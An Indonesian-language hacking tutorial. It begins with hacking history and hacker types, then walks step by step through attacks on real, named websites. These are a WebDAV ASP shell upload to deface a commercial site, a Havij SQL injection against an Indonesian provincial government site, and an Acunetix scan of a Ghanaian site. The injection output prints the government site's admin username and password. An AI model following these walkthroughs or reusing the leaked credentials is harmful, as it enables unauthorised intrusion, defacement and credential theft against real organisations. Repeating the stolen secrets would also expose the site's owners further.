Materi
Hacking :
Sejarah
Banyak versi mengenai sejarah hacking , namun saya hanya mengulas sedikit sejarah hacking secara umum maupun secara nasional . Sejarah hacking pertama kali lahir pada akhir tahun 1950-an,sebuah organisasi bernama MIT (Massachusets Institute of Technology) model railroad mendapat bantuan seperangkat peralatan telephone. Kemudian anggota kelompok ini memasang sebuah sistem yang lebih rumit pada alat tersebut sehingga alat tersebut mampu mengizinkan beberapa operator mengontrol secara bersama bagian-bagian untuk melakukan dialing ke nomor yang tepat. Mereka menyebut apa yang mereka lakukan sebagai hacking. Sementara itu , di indonesia . Hacking tengah berkembang pesat , Indonesia juga memiliki banyak ahli dalam dunia hacking . Seperti pak I Wayan dan Jim Geovedi . Menurut data riset suatu lembaga internasional juga menyebutkan indonesia memiliki perkembangan yang sangat cepat pada bidang hacking . Sekitar 30% serangan cyber di dunia berasal dari indonesia , Karena indonesia memiliki beberapa grup grup underground di setiap kota. Dan memiliki ribuan member yang tersebar di indonesia. Baik dari kalangan muda ataupun tua , berkisar antara anak smp sampai kuliah.Bahkan juga ada orang yang sudah berkeluarga.Jadi , Hacking sangatlah di minati di indonesia.
Menurut definisi global , hacking adalah kegiatan menerobos program komputer milik orang/pihak lain. Hacker adalah orang yang gemar mengotak atik komputer, memiliki keahlian membuat dan membaca program tertentu, dan terobsesi mengamati perkembangan security di dunia maya.Jika orang yang masih awam tentang dunia technology , maka orang akan menilai hacking adalah kegiatan merugikan dan meresahkan karena sering mencuri password , data , kartu kredit , dsb. Namun sebenarnya hacking bisa menjadi kegiatan yang positif. Seperti kita belajar bagaimana menembus sebuah sistim pertahanan di dunia maya , dan kita akhirnya harus mencari cara dan mempelajari bagaimana memperbaiki bug atau celah tersebut. Nah , dari sisi itu , sebenarnya hacker sangat di butuhkan di masa sekarang. Seperti negara negara adi kuasa layaknya Amerika, China , Rusia, Korea , bahkan negara asia tengah. Mempunyai pasukan tersendiri yang dinamakan cyberteam. Yang bertugas menjaga serta melindungi web web serta data pemerintah dari serangan hacker yang ingin meleak data pribadi negara. Sayangnya di indonesia , keberadaan hacker masih di ragukan serta di abaikan. Sebenarnya indonesia memiliki Hacker ataupun Group Hacker yang sangat banyak , bahkan di tahun 2013 ini di setiap kota penjuru indonesia , mempunya team team hacker tersendiri . Seperti contohnya : Jember Hacker , Palembang Hacker , Surabaya Blackhat , Yogyafree , Devilzc0de , dsb . Grup grup tersebut dihuni oleh master hacking indonesia , yang berpengalaman di dalam menerobos suatu jaringan komputer.
Menurut sifat dan manfaatnya , hacker dibagi menjadi beberapa jenis yaitu
White hat hacker, juga dikenal sebagai ethical hacker, adalah hacker yang bekerja secara kode etik , biasanya white hat hacker lebih offensive ketimbang lawannya yaitu black hat hacker . White hat fokus membangung sebuah system yang hampir tidak dapat di tembus oleh para blackhat. Black Hat Hacker , dikenal sebagai darkside of Hacker .Adalah jenis hacker yang bersifat kriminal. Memanfaatkan suatu kecacatan pada sistem untuk di eksploitasi dan mendapatkan keuntungan dari hal tersebut.Black Hat sangat sering melakukan pentesting secara illegal, namun pada akhirnya si black hat akan pindah ke white hat untuk mengasah skill offensivenya. Karena mempertahankan lebih susah daripada merusaknya.
Grey Hat Hackers, sesuai dengan filosofinya. Grey adalah hitam dan putih yang melebur jadi satu. Jadi , terkadang grey hat melakukan hal hal yang secara illegal seperti blackhat , namun hanya sebatas mengetest nya saja dan sekedar meninggalkan jejak layaknya deface dan backdoor.
Menurut pendapat saya , sangat banyak sekali jenis serangan hacker. Dimulai dari gathering information atau footprinting sampai pada tahap exploitasi pada server.Berikut ini saya coba sebutkan beberapa jenis serangan hacker yang umum di pakai
DDOS atau Distributed Denial of Service SQLInjection RFI atau Remote File Inclusion LFI atau Local File Inclusion XSS atau Cross Site Scripting Local Exploit Remote Exploit DNS Hijacking and Poisoning Human manipulation and Social Engineering Spamming and Spoofing
Mengapa kita juga perlu mempelajari Web Server , MySQL , dan PHP. Karena sebuah website itu berjalan pada suatu Web Server, Web Server di dominasi oleh apache web server , sedangkan mayoritas web di dunia ini menggunakan scripting php dan MySQL sebagai Database. Web Server nanti akan berguna jika kita melakukan gathering information dengan banner grabbing. Jadi kita bisa mencari remote atau local exploit dengan tepat untuk di arahkan ke Server target. PHP dan MySQL nanti akan berhubungan dengan bug dan SQLi , karena kita juga harus mengerti sedikit tentang logic website tersebut. Jadi kita bisa membuat perkiraan dimana titik lemahnya.
Pemanfaatan linux
Linux adalah sebuah open source operating system yang kebanyakan free. Mengapa saya katakan free ? Karena tidak sebuah linux free alias tidak berbayar. Ada beberapa produk Linux Enterprise yang di kenakan biaya pada penggunaanya. Linux sangat berguna bagi seorang hacker , karena linux mempunyai library lengkap untuk python , perl. Selain itu , mayoritas web server di dunia menggunakan Linux namun dengan versi kernel berbeda beda.
Ada suatu distro Linux yang di khususkan untuk kegiatan Pentesting Security.Ada beberapa os , dan saya sarankan anda mencoba satu persatu os tersebut agar mengerti perbedaannya
Backtrack
Salah satu OS yang sekarang saya gunakan , dengan motto The quiter you become , the more you able to hear. Backtrack memiliki tools tools yang digunakan untuk melakukan kegiatan hacking. Sangat lengkap mulai dari sisi Information Gathering sampai Attacking server. Backtrack menggunakan kernel Ubuntu 10.04 yang dikenal sebagai os paling ringan versi ubuntu.
Website : www.backtrack-linux.org Versi OS : Backtrack 5 R3 Size : 2,4 GB Available for : 32bit or 64bit and GNOME or KDE
BlackBuntu
BlackBuntu , dari namanya sudah terlihat ini adalah versi black-nya ubuntu. Dilengkapi dengan tools tools hacking , black buntu hadir layaknya ubuntu yang di sulap menjadi mesin penghancur. BlackBuntu menggunakan GNOME dan Sistim seperti ubuntu.Jika pada backtrack kita login sebagai root. Pada blackbuntu kita harus sudo su untuk masuk ke root.
Website : http://www.blackbuntu.com Versi OS : Blackbuntu 0.3 x86 x64 Size : 2,2 GB Available for : 32 and 64 bit and use GNOME or KDE
Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP. Utamanya website yg menggunakan server windows 2003.
http://www.mediafire.com/?8d6w6lr8064dgrx
Kalau sudah dibuka tinggal klik tulisan " Webdav " lalu klik " Asp shell maker
Setelah klik " Asp shell maker " anda akan melihat Program Webdav Shell Maker , jika sudah ada program Webdav Shell Maker anda klik tulisan " Setting ( untuk mengedit file / shell anda ) "
Tutorial Deface Menggunakan Tools webdav Setelah klik tulisan "Setting" edit tulisan /Hmei7.asp;.txt dengan tulisan anda
contohnya (/rama.txt sebenarnya tidak usah diedit juga tidak masalah ) setelah kalian edit tulisannya tinggal masukan target web / site korban .
Caranya tinggal klik " Add Site " lalu masukan site korban ( contoh : http://www.vintagefaucet.net) Jika sudah dimasukan web korban tinggal klik "Serang" (tunggu sampai ada notice)
checking : http://www.vintagefaucet.net shell created !! http://www.vintagefaucet.net/rama.txt
Melakukan injection database SQL dengan sebuah tools yaitu Havij, tools ini merupakan alat bantu saja untuk melakukan injection, karena sebenarnya konsep injection itu sendiri sebenarnya bisa hanya menggunakan perintah SQL melalui browser. Baik langsung saja tutorialnya.
1. Silahkan buka tools Havij anda, jika belum punya bisa di download Havij versi 1.15 Free http://www.ziddu.com/download/21429123/Havij1.15Free.rar.html
2. Masukkan link target ke kolom target lalu klik "Analyze" NB : Masukkan bagian url yang berakhiran id=angka untuk di inject, bukan indexnya Contoh : http://dishut.jatimprov.go.id/gallery.php?cat=1 seperti contoh yang ada di havijnya
3. Di bagian bawah, proses scan akan berjalan untuk mencari databasenya. Selama proses scanning, Havij akan berstatus Analyzing Target. Jika proses scan selesai, Havij akan berstatus I'm IDLE. 4. Jika Havij sudah berstatus I'm IDLE tekan tables, setelah itu klik "Get DBs"
Cara Inject Website Dengan Tools Havij 6. Nah disitu nanti akan ada beberapa table, coba anda tebak ada dimana
7. Jika sudah nanti anda akan menemukan data yang anda cari seperti username dan password. Anda centang keduanya lalu klik "Get Data" untuk melihat username dan passwordnya
letak admin dan passwordnya, biasanya terdapat tabel bernama tbl_admin tbl_admn jika anda sudah merasa menemukannya anda centang lalu klik "Get Column"
Injeksi pada website http://dishut.jatimprov.go.id/ sudah berhasil. Dianalisis. Host IP: 204.74.211.250 Web Server: Apache/2 Powered-by: PHP/5.2.17 Keyword Found: Gunung Injection type is Integer DB Server: MySQL Selected Column Count is 6 Valid String Column is 1 Current DB: hutankyu_datanya Count(table_name) of information_schema.tables where table_schema=0x687574616E6B79755F646174616E7961 is 27 Tables found: admin,berita,buletin,buletin_cat,cat_xxothers,category,catnews,catpok,catprofil,catsection,catwisata,gallery,news,pok,profil,section, wisata,xxgal,xxgal_cat,xxkecuali,xxkecuali_cat,xxnews,xxnews_cat,xxothers,xxothers_cat,xxwajib,xxwajib_cat Count(column_name) of information_schema.columns where table_schema=0x687574616E6B79755F646174616E7961 and table_name=0x61646D696E is 3 Columns found: id,username,password Count(*) of hutankyu_datanya.admin is 1 Data Found: username,password=permios^mon990s
Disitu sudah ditemukan, id password admin pada website pemerintahan jatim. Id: Permios
Password: mon990s
Sukses.
Acunetix adalah software untuk mendeteksi suatu celah kerentanan situs, Perusahaan Acunetix baru-baru ini telah merilis versinya yang ke 8, dan telah ditingkatkan sehingga membuatnya lebih cepat dan lebih baik. Fitur-fitur baru termasuk Scan Engine baru yang dapat mendeteksi celah kerentanan atau vulnerability, meningkatkan dukungan aplikasi web 2.0 dan penanganan manajemen sesi, kemampuan untuk menelusuri ulang kerentanan khusus untuk memverifikasi perbaikan, Fake Positive dan Fake Negative, dan yang terakhir kemungkinan bug website saat memindai, dan banyak lagi.
Menganalisa Website Menggunakan Tools Acunetix Saya akan memberikan contoh hasil scan sebuah website, yaitu
http://www.cocobod.gh/
Demikian pada website tsb memiliki banyak vuln diantaranya XSS dan file upload. Fitur-fitur selain menganalisa bug pada website acunetix juga menginformasikan cara patch seperti pada gambar tadi.